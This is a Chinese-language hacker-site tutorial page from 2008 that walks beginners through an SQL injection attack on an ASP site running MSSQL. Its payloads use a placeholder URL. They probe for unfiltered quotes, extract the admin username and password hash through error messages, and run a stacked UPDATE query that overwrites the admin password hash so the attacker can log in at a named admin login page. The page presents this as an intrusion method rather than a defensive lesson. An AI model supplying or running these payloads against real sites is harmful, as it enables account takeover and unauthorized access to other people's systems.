通行证│用户名: 密码: 验证码: 验证码,看不清楚?请点击刷新验证码 爱心红客 电信网通铁通移动 在线
文章搜索:
热门搜索:红客 黑鹰 红客技术 安全动画 红客培训
首页 文章 软件 动画 资源 励志 论坛 邮箱 会员 军事 科技 博客 爱心红客 最近更新 800g资源
 业内新闻 漏洞公告 病毒公告 电脑知识 网络知识 菜鸟入门 攻防教程 黑客攻防 安全编程 工具使用 综合安全 个人安全 安全相关 Q Q安全 原创精华 红客人物 站内事件
您现在的位置: 爱国者安全网 >> 文章类 >> 红客教程 >> 网络攻防 >> 文章正文
SQL注射修改难猜解的MD5
责任编辑:酷酷の鱼   更新日期:2008-7-4
 

来源:安全中国

在线破解MD5的网站上查。但有的MD5密码很偏,所以一些新手会放弃。我为新手介绍一种很简单就能修改难猜解MD5密码的方法。

  常入侵的高手就忽略过..

  随便找个地址

  http://www.xxx.org/news.asp?id=121

  在地址后输入单引号,显示

  Microsoft OLE DB Provider for SQL Server 错误 ’80040e14’

  字符串 ’’’ 之前有未闭合的引号

  /news/wantpws.asp,行63

  说明没有过滤单引号且数据库是MSSQL.

  and 1=1出错。and 1=2正常。

  接着输入

  http://www.xxx.org/news.asp?id=1 or admin_user in (select id from admin)

  得到帐号为:admin

  http://www.xxx.org/news.asp?id=121 or admin_password in (select id from admin)

  得到密码为:a4716077c2ba075c

  接下来我们就可以改密码了。但我们先前要知道我们加密的字符:e8dc763194f29433

  键入 :

  ;update shop_admin set password=’e8dc763194f29433’ where password=’a4716077c2ba075c’--

  这句的意思就是用e8dc763194f29433替换a4716077c2ba075c,以达到修改密码的目的。

  扫一下后台为

  http://www.xxx.org/admin/admin_login.asp

  • 上一篇文章:
  • 下一篇文章:
  • 最近更新
    推荐文章 瑞星公司07月04日发布 每日计算机病毒及木马播报
    普通文章 图解IE8的诸多安全特性 不被挂马影响
    普通文章 三招教你保障无线网络连接安全
    推荐文章 推荐:CSRF:不要低估了我的危害和攻击能力
    普通文章 邮件病毒入侵后的正确查杀方法
    普通文章 SQL注射修改难猜解的MD5
    普通文章 网管员经验心得 局域网管理的八个误区
    普通文章 SQL注入新威胁:将挑战操作系统安全
    普通文章 EB(Permeo e-Border)代理教程
    普通文章 Mozilla建议用户紧急升级Firefox3
    热门文章
    普通文章瑞星公司06月24日发布 每日计算机病毒及木马播报
    普通文章冷饭炒不断 又见旧新闻
    普通文章网易惊现色情新闻 疑遭黑客入侵
    普通文章盗移动靓号出售 黑客一审判11年
    普通文章网上售QQ强制软件 客服承认为木马程序
    普通文章黑客利用暴风影音漏洞传播网游盗号木马
    普通文章19岁黑客为推销防火墙产品黑掉联众网游
    普通文章Firefox 3实现目标:Web即操作系统
    普通文章银行赔90% 温州网上银行被盗案二审维持原判
    普通文章北京网络行业协会、江民科技联合发布06月25日病毒播报
    精彩专题